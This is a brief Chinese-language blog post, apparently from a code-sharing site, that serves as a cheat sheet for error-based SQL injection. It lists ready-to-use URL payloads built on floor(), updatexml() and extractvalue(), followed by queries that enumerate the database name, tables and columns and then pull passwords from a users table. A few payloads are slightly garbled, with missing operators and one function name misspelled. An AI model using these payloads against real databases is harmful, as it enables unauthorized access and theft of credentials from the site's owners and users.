sql注入

时间:2021-04-08 13:32:03   收藏:0   阅读:0

sql报错注入

1.报错函数

(1).floor()报错

语句:

?id=1‘ union select 1,count(),concat(payload,floor(rand(0)2))x from information_schema.columns group by x --+

(2).updatexml()报错

语句:

?id=1%27 and updatexml(1,concat(0x26,payload,0x26),1);---+

(3).exvalue()报错

?id=1′ and extractvalue(1,concat(0x26,database(),0x26));--+

2.查询payload

1.查数据库:database()

2.查表(要加括号):select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1

3.列:select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1

4.字段:select password from users limit 0,1

 

 

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2
迷上了代码!